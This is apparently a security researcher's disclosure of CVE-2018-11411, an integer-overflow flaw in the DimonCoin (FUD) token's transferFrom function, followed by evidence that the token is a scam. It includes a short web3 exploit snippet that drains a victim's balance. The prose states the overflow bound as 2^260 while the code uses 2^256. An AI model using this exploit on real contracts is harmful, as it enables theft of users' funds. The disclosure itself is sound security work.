DimonCoin(FUD), ERC20 token, allows attackers to steal all victim’s balances (CVE-2018–11411)

Abstract

I found a vulnerability of a smart contract for DimonCoin(FUD), an Ethereum ERC20 token (CVE-2018–11411)[1]. This vulnerability is exactly same with the UselessEthereumToken’s vulnerability[2, 3]. DimonCoin token also has the same vulnerable function which is transferFrom in UET token. Therefore, attackers can steal all victim’s balances into their accounts by exploiting this function. After more investigation, I found that DimonCoin(FUD) is a scam. There are multiple smart contracts of FUD token, and one of them has been dumped. I found the vulnerability in the different contract which is not dumped yet. In this article, I will explain the details of the vulnerability and the FUD token.

Details

As mentioned above, this vulnerability is same with the vulnerability of UselessEthereumToken (CVE-2018–10468)[3]. If you read the article “UselessEthereumToken(UET), ERC20 token, allows attackers to steal all victim’s balances (CVE-2018–10468)”, it will be helpful to understand it[2].

Figure 1. Code of transferFrom function in FUD smart contract

Figure 1. shows the vulnerable transferFrom function. The verification for ERC20 short address attack is moved to the modifier onlyPayloadSize. It is the only change and other part is exactly same with transferFrom function in UET token.

As you can see, the codes in the red box are wrong. By the code, a user can transfer balances more than address _from has, when balances[_to] + _value is overflowed. The correct code should be as follows:

bool sufficientFunds = fromBalance >= _value;
bool sufficientAllowance = allowance >= _value;
bool overflowed = balances[_to] + _value > balances[_to];
if (sufficientFunds && sufficientAllowance && overflowed) {

Exploit

All attackers have to do is find a target account and a value to cause overflow. If balances of a target account is 0xaaaa, the value should be more than pow(2,260)-0xaaaa. If the value is exactly pow(2,260)-0xaaaa, then all the target’s balances are transferred to attackers account. A part of my exploit code is as follows:

max = web3.utils.toBN('0x10000000000000000000000000000000000000000000000000000000000000000');
v_bal=web3.utils.toBN(await FUD.methods.balanceOf(victim).call());
FUD.methods.transferFrom(attacker, victim, max.sub(v_bal))
.send({from:attacker, gas:1000000, gasPrice:1});

Scam

DimonCoin(FUD) have been already regarded as a scam[4]. There are multiple FUD token’s smart contracts. I think the developers have created the several smart contracts to hide their cheats. Among the contracts, one is the vulnerable contract[5] that I found, and another one is a contract that is suspected to be dumped by the developers[6]. In the dumped contract, some accounts have the tokens more than total supply[7].

Figure 2. All top 10 holders have tokens more than 1000000% of total supply

The developers have advertised FUD token in bitcointalk using the two contract addresses[8]. The advertising article is translated to several languages, and there are 6 translation copies have advertised the vulnerable contract.

- Skandinavisk/Danish: https://bitcointalk.org/index.php?topic=2249616 
- German: https://bitcointalk.org/index.php?topic=2254901 
- Italian: https://bitcointalk.org/index.php?topic=2248634.0 
- Russian: https://bitcointalk.org/index.php?topic=2255885 
- Chinese: https://bitcointalk.org/index.php?topic=2250544 
- Korean: https://bitcointalk.org/index.php?topic=2292406

The developers already have removed their evidences. The official site, Telegram, Twitter and Github pages are down[9–12]. Only Facebook page is remain[13].

Conclusion

I am sure that DimonCoin(FUD) is a scam. The developers have created multiple contracts without rational reasons, one is dumped and the other one has a vulnerability. Moreover, communication channels to developers have been removed. It has been already widely known to people that it is scam, but still some people make transactions to the contracts. So, it should be known to more people. Please be careful when you trade unverified coins.

References